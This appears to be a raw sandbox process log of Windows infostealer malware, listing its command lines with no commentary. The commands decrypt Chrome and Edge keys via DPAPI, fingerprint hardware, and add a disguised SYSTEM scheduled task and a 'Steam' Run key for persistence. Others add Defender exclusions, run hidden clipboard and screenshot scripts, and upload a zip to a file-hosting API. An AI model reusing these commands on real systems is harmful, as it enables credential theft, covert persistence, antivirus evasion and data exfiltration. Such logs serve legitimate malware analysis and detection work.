powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,211,28,158,119,153,136,182,186,182,140,27,224,31,42,98,129,163,229,214,162,157,251,88,76,220,88,221,7,153,80,43,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,238,243,217,56,219,60,215,158,4,156,83,176,178,11,120,89,232,124,19,242,192,178,55,240,49,194,69,138,96,135,246,48,0,0,0,247,207,103,230,202,205,245,16,28,172,229,124,165,210,103,11,12,196,151,9,133,66,194,65,60,120,27,246,170,191,96,70,11,157,69,109,12,146,76,15,40,174,22,143,72,151,144,247,64,0,0,0,115,234,32,151,10,195,106,72,177,234,146,232,226,223,217,32,37,34,73,140,60,63,44,119,69,178,221,216,32,90,64,50,251,204,43,72,162,246,93,112,88,166,6,206,203,162,130,9,122,1,244,137,33,40,119,80,4,220,69,84,249,136,212,38), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,31,48,144,108,207,129,155,216,190,151,157,5,189,241,192,119,137,99,209,251,98,98,91,220,150,5,90,153,197,206,48,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,13,137,9,5,230,251,57,83,172,255,40,11,186,253,131,189,197,13,86,207,38,80,198,155,11,79,187,135,218,23,125,55,48,0,0,0,113,8,144,157,12,116,63,185,105,105,23,186,43,229,43,106,179,77,150,110,109,71,254,235,182,187,4,154,144,64,102,67,123,244,131,194,46,176,17,65,169,35,210,81,155,166,172,206,64,0,0,0,116,145,179,250,150,114,228,181,200,106,171,97,108,118,55,142,78,175,172,137,114,215,45,79,209,59,230,217,8,171,32,40,184,211,189,34,198,199,25,17,191,228,191,12,253,74,212,79,132,18,215,250,7,249,108,169,123,58,128,185,63,77,159,138), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,31,48,144,108,207,129,155,216,190,151,157,5,189,241,192,119,137,99,209,251,98,98,91,220,150,5,90,153,197,206,48,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,13,137,9,5,230,251,57,83,172,255,40,11,186,253,131,189,197,13,86,207,38,80,198,155,11,79,187,135,218,23,125,55,48,0,0,0,113,8,144,157,12,116,63,185,105,105,23,186,43,229,43,106,179,77,150,110,109,71,254,235,182,187,4,154,144,64,102,67,123,244,131,194,46,176,17,65,169,35,210,81,155,166,172,206,64,0,0,0,116,145,179,250,150,114,228,181,200,106,171,97,108,118,55,142,78,175,172,137,114,215,45,79,209,59,230,217,8,171,32,40,184,211,189,34,198,199,25,17,191,228,191,12,253,74,212,79,132,18,215,250,7,249,108,169,123,58,128,185,63,77,159,138), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\alkib1u5\alkib1u5.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5EE4.tmp" "c:\Users\Admin\AppData\Local\Temp\alkib1u5\CSC7E947611C34014BACF222DB2E44B9.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\Downloads\Discord Hack Tool.exe" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Aoyvszio.zip";"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\curl.exe

curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Aoyvszio.zip";

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

